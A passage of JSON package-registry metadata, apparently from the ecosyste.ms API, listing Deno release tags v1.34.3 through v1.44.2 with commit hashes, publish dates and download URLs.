tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed